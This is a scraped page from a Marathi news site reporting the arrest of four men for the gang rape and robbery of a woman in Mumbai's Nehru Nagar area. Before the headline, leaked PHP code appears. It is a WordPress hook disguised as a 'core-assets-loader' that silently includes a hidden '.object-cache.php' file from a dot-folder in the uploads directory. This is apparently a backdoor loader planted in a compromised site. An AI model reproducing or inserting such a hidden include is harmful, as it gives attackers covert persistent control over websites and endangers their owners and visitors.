add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुंबईतील नेहरु नगर भागात महिलेवर सामूहिक बलात्कार, चारजण अटकेत – SOCH INDIA
Menu

अपराध समाचार
मुंबईतील नेहरु नगर भागात महिलेवर सामूहिक बलात्कार, चारजण अटकेत

nobanner

मुंबईतील नेहरुनगर भागात एका महिलेवर सामूहिक बलात्कार झाल्याची घटना घडली आहे. पोलिसांनी या प्रकरणी चारजणांना अटक केली आहे. या चारही जणांची चौकशी सुरु आहे. मुंबईतील नेहरू नगर भागात एका महिलेवर सोमवारी रात्री सामूहिक बलात्कार करण्यात आला. याप्रकरणी महिलेच्या तक्रारीनंतर गुन्हा नोंदवण्यात आला असून या प्रकरणी चार जणांना पोलिसांनी अटक केली आहे. या चौघांची पुढील चौकशी करण्यात येते आहे.

पीडित महिला रात्री ११ वाजण्याच्या सुमारास नेहरु नगर भागात होती. ती कुर्ला रेल्वे स्थानकावरुन उतरुन लोकमान्य टिळक टर्मिनस या ठिकाणी पायी जात होती. त्यानंतर ती झुडपांमध्ये लघुशंकेसाठी गेली असता चारजणांनी या महिलेवर बलात्कार केला.

पीडित महिलेचे २८ हजार रुपये आणि मंगळसूत्र खेचून घेऊन हे चौघे जात होते. त्यावेळी या महिलेने १०० या क्रमांकावर फोन केला असता पोलीस तातडीने घटनास्थळी पोहचले. पोलिसांनी लोकांच्या मदतीने चारपैकी दोन आरोपींना तातडीने अटक केली. तर इतर दोन आरोपींना आज अटक करण्यात आली.